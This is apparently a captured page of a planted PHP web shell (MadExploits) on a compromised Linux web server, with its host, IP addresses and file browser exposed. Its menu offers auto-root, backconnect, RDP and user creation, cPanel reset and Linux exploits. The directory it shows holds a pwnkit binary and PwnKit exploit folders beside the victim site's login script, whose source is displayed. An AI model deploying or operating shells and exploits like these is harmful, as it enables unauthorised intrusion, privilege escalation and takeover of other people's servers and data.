Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.141.25.125
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
iTailor-gold /
pm /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
auth.php
2.73
KB
-rw-r--r--
db.php
448
B
-rw-r--r--
func.php
5.27
KB
-rw-r--r--
process-booking.php
3.31
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : auth.php
<?php session_start(); require_once('func.php'); // Set a default destination $rr = '../login.php'; // Example usage if ($_SERVER['REQUEST_METHOD'] == 'POST') { $username = $_POST['username']; $password = $_POST['password']; $csrf_token = $_POST['csrf_token']; // Validate CSRF token if (!validateCSRFToken($csrf_token)) { echo('<h1 style="color:red;">CSRF token validation failed.</h1>'); } else { // Validate user credentials if (authenticateUser($username, $password)) { $_SESSION['user'] = $username; // Successful login // echo "<h1 style='color:green;'>Login successful!</h1>"; $rr = '../contact-data.php'; } else { // Failed login echo "<h1 style='color:red;'>Invalid username or password.</h1>"; } } } else { echo '<h1 style="color:red;">Invalid Route: 404</h1>'; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Redirecting Page...</title> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="apple-touch-icon" sizes="180x180" href="../img/apple-touch-icon.png"> <style> @import url('https://fonts.googleapis.com/css2?family=DM+Sans:ital,opsz,wght@0,9..40,100..1000;1,9..40,100..1000&display=swap'); *{ box-sizing:border-box; /* outline:1px solid ;*/ } body{ font-family: "DM Sans", sans-serif; background: rgba(15, 11, 8, 0.85);; height: 100%; margin: 0; background-repeat: no-repeat; background-attachment: fixed; } .wrapper-1{ width:100%; height:100vh; display: flex; flex-direction: column; } .wrapper-2{ padding: 30px; text-align:center; } h1{ font-size:2.5em; font-weight: 900; letter-spacing:3px; color: #fafafa; margin:0; margin-top: 1.5rem; margin-bottom:1.5rem; } @media (min-width:600px){ .thankyoucontent{ max-width:1000px; margin:0 auto; } .wrapper-1{ height: initial; max-width:620px; margin:0 auto; margin-top:50px; } } </style> <script> var destinationURL = '<?=$rr ?>'; function redirectToDestination() { window.location.href = destinationURL; } setTimeout(redirectToDestination, 500); // Redirect after 5 seconds </script> </head> <body> <!-- <p>Redirecting in <span id="countdown">5</span> seconds...</p> --> <div class="wrapper-1"> <div class="wrapper-2"> <h1>Login sucessfully! </h1> </div> </div> <!-- Your HTML content goes here --> </body> </html>
Close